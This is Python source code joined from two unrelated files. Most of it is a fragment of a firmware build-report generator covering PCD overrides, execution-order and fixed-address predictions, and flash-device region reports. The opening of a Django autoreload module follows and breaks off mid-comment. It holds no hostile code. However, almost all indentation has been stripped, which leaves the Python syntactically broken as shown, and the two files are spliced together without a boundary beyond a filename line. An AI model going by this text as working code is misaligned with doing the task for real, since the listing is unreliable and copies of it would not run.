OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
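    #
    # Illustrative sketch (comment only) of what StrtoHex returns for the value
    # forms it understands (the inputs below are arbitrary examples):
    #
    #   self.StrtoHex("12")         # '0xc'                    - decimal integer
    #   self.StrtoHex('L"AB"')      # ['0x41', '0x42', '0x00'] - unicode string, NUL terminated
    #   self.StrtoHex('"A"')        # '0x41'                   - one-character ASCII string
    #   self.StrtoHex("{1, 0x2}")   # ['0x1', '0x2']           - byte array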
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
    # Invokes the EOT tool to get the predicted execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = open(SourceList, "w+")
for Item in self._SourceList:
FileWrite(TempFile, Item)
TempFile.close()
TempFile = open(GuidList, "w+")
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
TempFile.close()
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
    # This function generates the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
    # This function generates the predicted fixed address report for a module or
    # the predicted module execution order for a platform.
    # If the input Guid is None, it generates the predicted module execution order;
    # otherwise it generates the fixed loading address report for the module specified
    # by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nested FVs, they will be listed immediately after
# this FD region subsection
#
class FdRegionReport(object):
##
    # Discover all the nested FV names.
    #
    # This is an internal worker function to discover all the nested FV information
    # in the parent firmware volume. It uses a depth-first search algorithm recursively
    # to find all the FV names and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
    # This constructor function generates an FdRegionReport object for a specified FdRegion.
    # If the FdRegion is a firmware volume, it recursively finds all of its nested firmware
    # volumes. This function also collects a GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
                for Ffs in Wa.FdfProfile.FvDict[FvDictKey].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
    # This internal worker function generates the report for the FD region.
    # If the type is a firmware volume, it lists the module offsets and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
            # Ensure FvReportFileName is always defined before it is opened below.
            FvReportFileName = FileExt
            if not os.path.isfile(FvReportFileName):
                FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
                if not os.path.isfile(FvReportFileName):
                    FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
                EdkLogger.warn(None, "Failed to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
            if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
    # This constructor function generates a PlatformReport object for a platform build.
    # It generates a report for the platform summary, flash, global PCDs and detailed
    # module information for modules involved in the platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
    # This function generates the report for platform information.
    # It comprises the platform summary, global PCD, flash and
    # module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contains the routines to collect data and then
# apply a certain format to the output report.
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
    # This constructor function generates a BuildReport object for a platform build.
    # It generates a report for the platform summary, flash, global PCDs and detailed
    # module information for modules involved in the platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
                File = BytesIO()
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, True)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
autoreload.py
|
import functools
import itertools
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import traceback
import weakref
from collections import defaultdict
from pathlib import Path
from types import ModuleType
from zipimport import zipimporter
from django.apps import apps
from django.core.signals import request_finished
from django.dispatch import Signal
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
autoreload_started = Signal()
file_changed = Signal()
DJANGO_AUTORELOAD_ENV = 'RUN_MAIN'
logger = logging.getLogger('django.utils.autoreload')
# If an error is raised while importing a file, it's not placed in sys.modules.
# This means that any future modifications aren't caught. Keep a list of these
# file paths to allow watching them in the future.
_error_files = []
_exception = None
try:
import termios
except ImportError:
termios = None
try:
import pywatchman
except ImportError:
pywatchman = None
def check_errors(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
raise _exception[1]
def ensure_echo_on():
"""
Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after reload.
"""
if not termios or not sys.stdin.isatty():
return
attr_list = termios.tcgetattr(sys.stdin)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(sys.stdin, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def iter_all_python_module_files():
# This is a hot path during reloading. Create a stable sorted list of
# modules based on the module name and pass it to iter_modules_and_files().
# This ensures cached results are returned in the usual case that modules
# aren't loaded on the fly.
keys = sorted(sys.modules)
modules = tuple(m for m in map(sys.modules.__getitem__, keys) if not isinstance(m, weakref.ProxyTypes))
return iter_modules_and_files(modules, frozenset(_error_files))
@functools.lru_cache(maxsize=1)
def iter_modules_and_files(modules, extra_files):
"""Iterate through all modules needed to be watched."""
sys_file_paths = []
for module in modules:
# During debugging (with PyDev) the 'typing.io' and 'typing.re' objects
# are added to sys.modules, however they are types not modules and so
# cause issues here.
if not isinstance(module, ModuleType):
continue
if module.__name__ == '__main__':
# __main__ (usually manage.py) doesn't always have a __spec__ set.
# Handle this by falling back to using __file__, resolved below.
# See https://docs.python.org/reference/import.html#main-spec
            # __file__ may not exist, e.g. when running the ipdb debugger.
if hasattr(module, '__file__'):
sys_file_paths.append(module.__file__)
continue
if getattr(module, '__spec__', None) is None:
continue
spec = module.__spec__
# Modules could be loaded from places without a concrete location. If
# this is the case, skip them.
if spec.has_location:
origin = spec.loader.archive if isinstance(spec.loader, zipimporter) else spec.origin
sys_file_paths.append(origin)
results = set()
for filename in itertools.chain(sys_file_paths, extra_files):
if not filename:
continue
path = Path(filename)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
# The module could have been removed, don't fail loudly if this
# is the case.
continue
except ValueError as e:
# Network filesystems may return null bytes in file paths.
logger.debug('"%s" raised when resolving path: "%s"', e, path)
continue
results.add(resolved_path)
return frozenset(results)
@functools.lru_cache(maxsize=1)
def common_roots(paths):
"""
Return a tuple of common roots that are shared between the given paths.
File system watchers operate on directories and aren't cheap to create.
Try to find the minimum set of directories to watch that encompass all of
the files that need to be watched.
"""
# Inspired from Werkzeug:
